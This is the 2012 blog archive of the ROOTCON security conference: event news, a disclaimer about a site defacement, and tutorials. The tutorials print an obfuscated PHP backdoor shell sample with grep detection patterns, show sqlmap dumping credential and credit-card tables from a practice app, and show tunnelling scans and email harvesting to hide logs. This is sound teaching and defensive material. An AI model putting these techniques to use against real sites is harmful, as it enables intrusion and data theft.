Pages

Saturday, December 01, 2012

Sulit.com.ph hacking incident

Around 15:00 while upgrading the ROOTCON systems one of the ROOTCON Goons reported that there was a hacking incident on Sulit (an online buy and sell portal http://www.sulit.com.ph) the incident was claimed by ROOTCON.ORG and ANONYMOUS.


The Sulit website was replaced by the homepage of Ayosdito.ph, another classified ads portal in the country. Also, the title of the hacked page states: “ROOTCON.ORG We are anonymous. We are Legion. We do not forgive. We do not forget.” 
Sulit.com.ph temporarily shut down its site, and issued an advisory to the public via Twitter @sulit:“A relatively simple attack was made against us. We should be back online and back to normal in a few minutes. To be clear, only a 3rd-party vendor was compromised; our data, application, and servers were unaffected and are intact.”   source: http://infolikes.com/internet/sulit-com-ph-website-hacked/

The ROOTCON core group is composed of high level security professionals, we always ensure we observe proper ethics through responsible full-disclosure if given one of our members found a serious vulnerabilities on certain web application or network. The internet is a free world to live anyone can easily tag and use the name ROOTCON as part of their hacking adventure. ROOTCON is not an underground group we are a legitimate group registered under Security and Exchange Commission, we only provide neutral venue where enterprise, government and underground share best practice, latest trends and cutting edge security techonologies.

On behalf of ROOTCON and its Goons I would like to inform everyone that ROOTCON and its crew does not condone illegal activities like this and we are not part of the hacking incident that occurred. The attack was acknowledged by certain group which is NOT part of ROOTCON. This incident is another heads-up to our security professionals and system administrators to take information security seriously; its a crazy world out there.


Check out the Official Sulit Press Release


semprix (The Fork Meister)

Tuesday, July 17, 2012

RC6 Ticket Sale

Early Registration for ROOTCON 6 ended yesterday July 16, 2012 at exactly 12 midnight.

Regular rate registration is now open until August 17, 2012, since we want you to come!!! we are still giving away discounts get our group of 5 package and get 10% off.

What are you waiting for REGISTER NOW!!!!

http://rootcon6.eventbrite.com/
https://www.rootcon.org/xml/rootcon6/register


Saturday, July 14, 2012

The Secrecy (New Game)

This year we introduce to you "The Secrecy" is composed of 10 levels, each levels has a secret / hidden phrase or word that you need to find for the players to proceed to the next levels.

Let the cracking begin!!!

Game Mechanics 
The objective of this game is to reach the top-most level which is level 10. In order to achieve that you need to pass each level and get the secret / hidden phrase or word.

The Rules 
1. NO DIRECT DDoS on the game servers.
 2. NO Physical Coercion on players and crew.
 3. Spies works on their own, this is a single player game. You can however have a handler to coach you throughout the game.
 4. Spies are resourceful breaking codes, so be like one ;-)
 5. Bring your own spy gears, laptop, AP, GPS tracking, whatever you think you will need.

Who Can Play 
Any ROOTCON attendee (except for the ROOTCON Goons).

When 
Start of the conference

Prizes Shining UberH4x0r Badge, which entitles you to be put up on the ROOTCON Hall of Fame, free entrance on the next ROOTCON Conference.

Crew / Agents / Handlers 
Encrypted84 Semprix (The Fork Meister)

More details at https://www.rootcon.org/xml/rootcon6/activities#secrecy

Monday, June 11, 2012

ROOTCON 6 SpeedTalks

At ROOTCON we value everyone....CON-Goers, Sponsors and Partners. This year we are giving away our sponsors the opportunity to talk about what they do, this year we introduced "SpeedTalks". SpeedTalks is available to all major participating sponsors for ROOTCON 6.

The mechanics is pretty straight forward.

1. Avail one of the Major Sponsors of ROOTCON 6

  • Platinum
  • Gold
  • Silver
2. Sponsoring company will send a delegate for their entry on SpeedTalks.
3. Sponsoring companies are given a blazing 10 minutes for their product demo / presentation and product updates.
4. SpeedTalks will be given on Day 1 and Day 2.
5. ROOTCON will align all schedules to the sponsoring company representatives.
6. NO QUESTIONS should be entertained during the SpeedTalk, the allotted 10 minutes is purely presentation / demo / talk. All questions should be addressed on the sponsors booth.

What are you waiting for? Contact our sponsorship liaison.

-Semprix

Sunday, June 10, 2012

Checking out BackTrack Linux 5r2-PenTesting Edition Lab!


What's a BackTrack Linux 5r2-PenTesting Edition Lab? What's with the edition thingy? Isn't BackTrack 5 a pentesting distro already? Why make a pentesting edition?

Maybe these are some of the questions you have in your mind after reading the title and because of that, I would like to give some few points about this edition.

BackTrack Linux 5r2-PenTesting Edition Lab is still the same BackTrack 5 r2 with the same pentesting tools pre-installed in the distribution and has KDE as its Desktop Environment although in backtrack-linux.org you can also choose if you want Gnome or KDE. The only difference is that it includes all of the hosts, network infrastructure, tools, and targets necessary to practice penetration testing for the CPLT or Certified PenTest Laboratory course which is brought to you by PenTest Laboratory and the guys behind PenTest Magazine. 

This edition is a modified version of NETinVM which has a predefined User-mode Linux (UML) based penetration testing targets. When started, this builds an entire network of machines within the VMware virtual machine. The BackTrack Linux distribution is used to provide the tools necessary for completing the lab scenarios. Thus, It is an an all-in-one penetration testing lab environment that pre-configured with:

- A master (base) host utilizing BackTrack Linux 5r2
- A DMZ network with two hosts (targets)
- An “internal” network with one host (target)
- A pre-configured firewall

This pentesting lab is available for free to non-CPLT course students which can be downloaded here

Here are some of targets you can attack or play with:

- 10.5.0.1
- 10.5.0.254
- 10.5.1.10
- 10.5.1.254


About the Contributor:
Shipcode is a prolific blogger of ROOTCON and at the same time an InfoSec enthusiast from Cebu. He was inspired to join ROOTCON as part of the core team to share his knowledge in information security.  He encourages other like minded individuals to come forward and share their knowledge through blogging right here at ROOTCON Blog section.

ROOTCON is managed by like minded InfoSec professionals across the Philippines.  All rights reserved. Designated trademarks, brands and articles are the property of their respective owners.

Monday, June 04, 2012

8 Hacking and Information Security Magazines You Might Wanna Read

As a programming student, security researcher and a blogger; I always keep up to date about what is happening in cyber space by reading infosec articles and magazines. Magazines I usually read have niches or themes like Information Security, Cyber Warfare, Cyber Espionage, Penetration Testing and Hacking. And so here are 8 Hacking and Information Security Magazines that I like to share to all of you guys:


1. Hakin9 - Hakin9 Magazine is a payable magazine devoted to IT security and covers techniques of breaking into computer systems, defense and protection methods, tools and latest trends in IT Security. It has 4 different editions every month: Hakin9 – main issue, Hakin9 Extra – every issue is devoted to one topic only, Exploiting Software magazine – Partition Analysis, Stack Overflow and many more, and Mobile Security – hacking and securing of mobile systems and applications.



2. PenTest Magazine - PenTest Magzine is a payable magazine which focuses on Penetration Testing. It features articles by penetration testing specialists, enthusiasts, and experts in vulnerability assessment and management. The PenTest Magazine features 48 issues in a year – 4 issues in a month. Different title is published every week; PenTest Regular, Auditing & Standards PenTest, PenTest Market, and Web App Pentesting. Their team is also behind the Certified PenTest Laboratory Tester (CPLT) Certification.



3. ClubHack Magazine - ClubHack Magazine or CHmag is India's 1st Hacking Magazine and one of the media partners of ROOTCON. Their magazine is free to download and is divided into the following sections: Tech Gyan,  Legal Gyan, Tool Gyan, Mom's Guide, Matriux Vibhag, and Code Gyan. I also contributed one article to this magazine which is about Decoding ROT using the Echo and Tr Commands in your Linux Terminal. They are also the organizers of ClubHack Conference.


4. (IN)SECURE Magazine - (IN)SECURE Magazine is a free digital security publication discussing  information security topics by Help Net Security which has been a prime resource for information security news since 1998.. They also accept guest authors and has a lot of subscribers.


5. Phrack Magazine - Nothing beats the old school! Nobody messes with the Phrack Magazine which is an online ezine for hackers and by the hackers. Phrack was first released on November 17, 1985 which until now became the largest computer underground ezine. In fact, The Hacker’s Manifesto was also published in this online ezine on the 7th issue. Truly an old yet awesome archive which takes you to the old days of the hacker culture in the 80′s. The current issue is 68 and I thought it will end on issue number 63 but the good thing is it is still alive and kicking.



6. 2600: The Hacker Quarterly - 2600: The Hacker Quarterly is a publication that focuses in publishing information about subjects like phreaking, infosec, hacking, the computer underground, anarchist issues, and many more. 2600 has established the H.O.P.E. (Hackers On Planet Earth) conferences as well as monthly meetings in some countries.



7. Hacker5 - Hacker5 is a monthly magazine from India which provides you with some of the latest happenings in the Cyber world. Their team is composed of journalists and ethical hackers. Some of their magazines are free to download and some are payable. In their website, they also have a dedicated page for the hackers, security professionals and developers that they interviewed.



8. Hacker Monthly - Hacker Monthly is the print magazine edition of Hacker News which is a known social bookmarking news website and popular among programmers, SEO Specialists, Link Builders, developers, geeks and startup founders.Every month they select from the top voted articles that are bookmarked on Hacker News website and print them in magazine format but it is not for free anymore.


About the Contributor:
Shipcode is a prolific blogger of ROOTCON and at the same time an InfoSec enthusiast from Cebu. He was inspired to join ROOTCON as part of the core team to share his knowledge in information security.  He encourages other like minded individuals to come forward and share their knowledge through blogging right here at ROOTCON Blog section.

ROOTCON is managed by like minded InfoSec professionals across the Philippines.  All rights reserved. Designated trademarks, brands and articles are the property of their respective owners.

Thursday, May 31, 2012

ROOTCON 6 Call For Papers Now Close

ROOTCON 6 Call For Papers is now close, we would like to thanks everyone who submitted. For those who were not accepted you can still enjoy the fun at ROOTCON by registering, socialize, network, learn and have fun.

Pre-final tracks can be found here

Get to know our ub3r4w3s()me speakers here

We will be posting ROOTCON 6 schedule soon.

What are you waiting for? Register now (Early Registration closing on June 30, 2012) and witness the fun and educational event this coming September 7-8, 2012.

Hope to see you all at the CON.

Sunday, May 20, 2012

New CFP Submission

New CFP submission has landed our Inbox.

Topic Details

Presentation Title: Randomized/Obfuscated Text Detection
Synopsis: Recent malwares have been using obfuscation techniques to hide its code from Antivirus software. Making use of emulation is very effective but would probably result in a slow performing machine especially when your valid apps are getting scanned from malwares. Thus, before a full emulation can be done, a static detection can help minimize this slow performance. Detecting the existence of obfuscated text segregates valid applications from malwares. This topic shows different methods on how to determine if a certain text is rather randomized.


Speaker: Reginald Wong
Speaker Background: Reggie has been in the anti-malware industry for almost 10 years doing research on different types of malwares. He currently heads the heuristics team at GFI Software Philippines and aims to detect malwares before they get in to your system.


More at https://www.rootcon.org/xml/rootcon6/tracks

Early Registration Closing Soon!!!!


Our 2 months run for the early registration will be closing this coming June 30, 2012. If you haven't registered yet, register now to get big discounts!!! 

Visit the registration page now!!!

Wednesday, May 16, 2012

May 2012 issue of ClubHack Magazine is out now!

ClubHack Magazine's May 2012 issue has just been released yesterday guys and thanks to the Chmag Team for giving us free monthly issues!


Topics:
0x01 - Steganography over converted channels (Tech Gyan)
0x02 - Kauntilya (Tool Gyan)
0x03 - Section 66C - Punishment for identity theft (Legal Gyan)
0x04 - HTTPS (Hyper Text Transfer Protocol Secure) (Mom's Gide)
0x05 - Don’t Get Injected – Fix Your Code (Code Gyan)

Download the new issue here.
About the Contributor:
Shipcode is a prolific blogger of ROOTCON and at the same time an InfoSec enthusiast from Cebu. He was inspired to join ROOTCON as part of the core team to share his knowledge in information security.  He encourages other like minded individuals to come forward and share their knowledge through blogging right here at ROOTCON Blog section.

ROOTCON is managed by like minded InfoSec professionals across the Philippines.  All rights reserved. Designated trademarks, brands and articles are the property of their respective owners.

Tuesday, May 15, 2012

Hackxor - Web App Hacking Game

Are you a gamer and at the same time a penetration testing enthusiast in web applications?

Well then, you might wanna try whacking out 'hackxor'! Hackxor is a web application hacking game where players must locate and exploit vulnerabilities to progress through the story wherein you play as a blackhat hacker  hired to track down another hacker by any means possible. It contains scripts that are vulnerable to Cross Site Scripting(XSS), Cross Site Request Forgery(CSRF), Structured Query Language Injection (SQLi), Remote Command Injection(RCE), and many more. It's also a web application running on Fedora 14. 

Download & install instructions

  • 1. Download the full version of hackxor (700mb)
  • 2. Install VMWare Player (This involves creating a free account with vmware)
  • 3. Extract hackxor1.7z, run the image using VMware player.
  • 4. Work out what the IP of hackxor is ((try 172.16.93.129)|| logging into the VM with username:root pass:hackxor and typing ifconfig)
  • 5. Configure your hosts file (/etc/hosts on linux) to redirect the following domains to the IP of hackxor: wraithmail, wraithbox, cloaknet, GGHB, hub71, utrack.
  • 6. Browse to http://wraithmail:8080 and login with username:algo password:smurf



About the Contributor:
Shipcode is a prolific blogger of ROOTCON and at the same time an InfoSec enthusiast from Cebu. He was inspired to join ROOTCON as part of the core team to share his knowledge in information security.  He encourages other like minded individuals to come forward and share their knowledge through blogging right here at ROOTCON Blog section.

ROOTCON is managed by like minded InfoSec professionals across the Philippines.  All rights reserved. Designated trademarks, brands and articles are the property of their respective owners.

Thursday, April 26, 2012

Simple Kung Fu Grep for Finding Common Web Vulnerabilities & Backdoor Shells

Grep is a powerful command-line tool in Unix and Linux used for searching and probing data sets for lines that matches a regular expression. As a short history, this utility was coded by Ken Thompson on March 3, 1973 for Unix.

Here is a sample or common usage of the said tool for searching a text string pBot in my php file bot.php:

grep pbot bot.php
Alright let's proceed on the objective of this article which is to find common vulnerabilities, backdoor shells and other malicious files using the grep command. For this writeup I'm using grep version 2.9 so if you are using a an older version of GNU grep which is below 2.5.4,  some of the commands in this article may not work although grep. To determine the version of grep you can just type grep -V or grep --version in your terminal. For the other commands and arguments that can be appended to this command line kung fu, you can also type grep --help for more information.
Common Usage for Finding Vulnerabilities
The very reason why most web applications can be easily hacked or pawned because of insecure codes and functions that can be exploited. Take for example command injection or also known as remote code execution in terms of web exploitation, can be possible to a certain website accepts added strings of characters or arguments; the inputs are used as arguments for executing the command in the web server. And because most vulnerable web applications use the shell_exec function. We can use the grep command to search for the shell_exec in as our advantage in our /var/www directory to check for the possible PHP files that are vulnerable to RCE or command injection. Here is the command: 

grep -Rn "shell_exec *( " /var/www

In the image above, we can see that it displays the path of the vulnerable script and the line of the function.

Another example: the include, require, include_once and require_once functions which are common PHP functions in a vulnerable script that is possible for LFI or Local File Inclusion which is 
a kind of exploit or vulnerability that allows an attacker to inject directory traversal characters on a certain website. 

Again, we can use these functions for searching possible vulnerable scripts in our web server:

grep -Rn "include *(" /var/www
grep -Rn "require *(" /var/www
grep -Rn "include_once *(" /var/www
grep -Rn "require_once *(" /var/www
There are other PHP functions out there that can also be used for finding other web vulnerabilities. Just use Google for other functions :)

Grepping for Backdoor Shells and other Malicious Files


Backdoors are used by web defacers and hackers to maintain access on the web server which allows them to execute arbitrary commands, download files, edit files, and for back-connection. Most backdoor shells use the shell_exec function for command execution. And because most anti-viruses and rootkit scanners can detect backdoor shells, attackers use PHP encoders for evasion. But because functions like base64_decode and eval are used in this technique, they can't escape the wrath of grep. Here is a sample backdoor shell that has upload and system information functions only encoded using Carbylamine PHP Encoder:


<?php function KJnPCP($XZK)


{
$XZK=gzinflate(base64_decode($XZK));
for($i=0;$i<strlen($XZK);$i++)
{
$XZK[$i] = chr(ord($XZK[$i])-1);
}
return $XZK;
}
eval(KJnPCP("U1QEAm4gzkrXzCopSSvVVE3wcAuN0SjJTMvN1YjT0lJMS8ks
0FS2LSxOs1fWBwsnpFWmpaAp1FdWVFfW0le2NQAr1LLBZmhhZiHCyLTypF
zNktLirMKUktwkoDElaMqwmwHSizAEVdCG28GeGwA="));
?>

Aside from shell_exec, base64_decode, and eval; here are other functions used by PHP backdoor shells:

phpinfo

system
php_uname
chmod
fopen
flclose
readfile
edoced_46esab
passthru

Thus you could also easliy grep these functions:


grep -Rn "shell_exec *(" /var/www
grep -Rn "base64_decode *(" /var/www
grep -Rn "phpinfo *(" /var/www
grep -Rn "system *(" /var/www
grep -Rn "php_uname *(" /var/www
grep -Rn "chmod *(" /var/www
grep -Rn "fopen *(" /var/www
grep -Rn "fclose *(" /var/www
grep -Rn "readfile *(" /var/www
grep -Rn "edoced_46esab *(" /var/www
grep -Rn "eval *(" /var/www 
grep -Rn "passthru *(" /var/www
 
In my recent analysis, some of these functions are used by IRC bots that have malicious functions like vulnerability scanners, automatic backdoor bots, DoS bots, udpflooder bots, etc.

Oh, and you might wanna add tcpflood and udpflood strings for grepping malicious files too because these are commonly used by IRC bots that have udpflood and tcpflood functions.
What you saw from the image above is a sample of a pBot which is a PHP IRC bot  used by some attackers to initiate DDoS (Distributed Denial of Service) / DoS (Denial of Service) attacks.

We can also list all these common functions by using this command in your terminal:


grep -RPn "(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile|php_uname|eval|tcpflood|udpflood|edoced_46esab) *\(" /var/www

References: 
http://25yearsofprogramming.com/blog/2010/20100315.htm
http://php.net/

About the Contributor:
Shipcode is a prolific blogger of ROOTCON and at the same time an InfoSec enthusiast from Cebu. He was inspired to join ROOTCON as part of the core team to share his knowledge in information security.  He encourages other like minded individuals to come forward and share their knowledge through blogging right here at ROOTCON Blog section.

ROOTCON is managed by like minded InfoSec professionals across the Philippines.  All rights reserved. Designated trademarks, brands and articles are the property of their respective owners.

Saturday, April 14, 2012

ClubHack Magazine April 2012 Issue Released!


India's 1st Hacking Magazine which is ClubHack or CHmag has just released their April 2012 Issue. CHmag happens to be our media partner and that CHMag is one of the hacking/infosec magazines I'm currently following because of the good contents from various authors  and for this issue I also contributed an article for the Mom's Guide. Here are the topics for this month's issue:
-Decoding ROT using the Echo and Tr Commands in your Linux Terminal
-How to enable WiFi on Matriux running inside VMWare
-Local File Inclusion
-Poster of the Month
-Provisions of Sec. 66B
-Sysinternals Suite
-XSS – The Burning issue in Web Application
The new burner for this issue is the new section which is the Code Gyan that started with a new topic entitled Local File Inclusion.

You can download the PDF File here or you could check out the archives for their previous issues in their official website.


About the Contributor:
Shipcode is a prolific blogger of ROOTCON and at the same time an InfoSec enthusiast from Cebu. He was inspired to join ROOTCON as part of the core team to share his knowledge in information security.  He encourages other like minded individuals to come forward and share their knowledge through blogging right here at ROOTCON Blog section.

ROOTCON is managed by like minded InfoSec professionals across the Philippines.  All rights reserved. Designated trademarks, brands and articles are the property of their respective owners.

Thursday, April 12, 2012

Tunneling the Applications you launched on your Terminal with Tsocks

With some of the applications that don't have proxy configurations or settings, how can we add anonymity to our information gathering, scanning, exploiting phases, etc. like nmapping, using theharvester to gather emails, and many more? It's bad leaving your footprints and logs right?

Well if we have tsocks application then it would be easier since it can send TCP connections automatically through a SOCKS server. If tsocks is not installed on your distro, you can just find it on the software repository. In my case, BackBox Linux has tsocks pre-installed. It can be used for TORifying or tunneling your applications that doesn't have proxy capabilities. Supposed I opened a certain SSH server then binded my localhost at 9191 TCP port, I need to configure /etc/tsocks.conf to:

local = 192.168.0.0/255.255.255.0

server = 127.0.0.1

server_type = 5

server_port = 9191
For TOR, you can just edit the server_port to 9050 because it opens a SOCKS local server at 9050 TCP port.

ssh -D 9191 user@hostname

After configuring tsocks, try to check if tsocks is working good by using the lynx web browser to connect to a website that tells you if you are tunneled or you could also tunnel to another ssh server and issue the command w/who. Be sure to put tsocks before the command. For example:

tsocks lynx whatismyip.net

The IP of the SSH Server ;)

The image below is my original IP without using ssh tunneling:


See the difference ayt!

So if I want to launch theharvester (email harvester) anonymously, I need add tsocks before theharvester command:

tsocks theharvester -d rootcon.org -l 500 -b google


 Now you can run your pentesting tools with added anonymity :)


About the Contributor:
Shipcode is a prolific blogger of ROOTCON and at the same time an InfoSec enthusiast from Cebu. He was inspired to join ROOTCON as part of the core team to share his knowledge in information security.  He encourages other like minded individuals to come forward and share their knowledge through blogging right here at ROOTCON Blog section.

ROOTCON is managed by like minded InfoSec professionals across the Philippines.  All rights reserved. Designated trademarks, brands and articles are the property of their respective owners.

Sunday, April 08, 2012

ROOTCON Easter Egg Solution

The ROOTCON Easter Egg Hunt is over, the hunt was pretty simple and straight forward, you just need to know some of the basic arsenal in your day to day hacking escapade.

The Solution:

Easter Egg #1 = The image show Master Yoda speaking the very familiar line "May the source be with you" followed by "A n00b you are". If you are a geek and into tech, you wouldn't miss watching Star Wars, the line "May the force be with you", was replaced with source, meaning it's giving you a hint that the first egg can be found on the source code of the page egg1.php

Easter Egg #2 = Easter Egg #2 has something to deal with braille, we gave the hint "3 blind mice", so you need to decode the braille dots into letters.

Easter Egg #3 = The ROOTCON Vault, this is pretty easy, you can de-crypt the vault using uudecode, or even Perl can unpack it. The first line of the vault says Begin blah blah, this should give you enough hint how it was being encrypted.

Easter Egg #4 = This Easter Egg is very simply, the picture of Cookie Monster says it all plus the text we placed. "Cookie" Monster. "No Cookie For You". The hint tells you that the next word is hidden under the site cookie. There are a lot of Add-ons, Plugins for browsers that will let you examine what is written off its cookie, Google Chrome has its native tool to do that "Developer Tools"

Easter Egg #5 = Again going back to the "image text" for hints, it says "Undress the ROOTCON Easter Bunny". The easter bunny is an image, to undress or to get information under an image you need to examine the EXIF attributes found on the image.

Only the first one to crack all the codes who will be entitle for the 50% discount offer for the ROOTCON 6 ticket.

Here are the top four winners (Click the image to enlarge)
(Note: We masked the Lastname of the winners to protect their identity)




I hope everyone enjoyed our little Easter Special.

ROOTCON


Saturday, April 07, 2012

ROOTCON Easter Egg Hunt

Here we go, ROOTCON Easter Egg Hunt.

Instructions (Read Carefully)
1. Search for each word contained on each egg
2. Gather all words found on each egg
3. Combine all words into one
4. Send your code to registration [at] rootcon d0t org
5. You are entitled for a 50% discount ;-)

Start cracking some eggs at http://easteregg.rootcon.org/

Remember: This is a race, so the promo code is valid for one use only 

GOOD LUCK!!! and HAPPY EASTER 

Dumping Like a Boss - sqlmap 101


SQLmap is one of the most common used tools for web application penetration testing because it is open source and automates an sql injection attacks which also allows you to spawn a shell. It has full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB DBMS/ Database Management System. It is also coded in python.

To check all the attributes and options for this tool type sqlmap -h on your terminal.

Suppose we have a vulnerable link after checking it, we append URL target with --dbs to check for the databases:

$ sqlmap -u 'http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' --dbs

After that we should be able to see the back-end DBMS, web server, and most importantly the databases.


Databases enumerated:
[*] dvwa
[*] information_schema
[*] mysql
[*] owasp10

Now let's check all the tables for the owasp10 database. This is the database for the Mutillidae Web Application.

$ sqlmap -u 'http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' -D owasp10 --tables


Tables enumerated:
+------------------------+
| accounts
| blogs_table
| captured_data
| credit_cards
| hitlog
| pen_test_tools
+-------------------------+


Now let's try to dump all the columns for the accounts table:

$ sqlmap -u 'http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' -D owasp10 -T accounts --dump


Right, we got columns cid, mysignature, password and username =)

Similar query: Select * from accounts;

Now's let's try dumping the credit_cards table:

$ sqlmap -u 'http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' -D owasp10 -T credit_cards --dump


Similar query: Select * from credit_cards;

Well, that should be it! I hope you were able to understand how to use sqlmap to dump the tables of a certain database.


About the Contributor:
Shipcode is a prolific blogger of ROOTCON and at the same time an InfoSec enthusiast from Cebu. He was inspired to join ROOTCON as part of the core team to share his knowledge in information security.  He encourages other like minded individuals to come forward and share their knowledge through blogging right here at ROOTCON Blog section.

ROOTCON is managed by like minded InfoSec professionals across the Philippines.  All rights reserved. Designated trademarks, brands and articles are the property of their respective owners.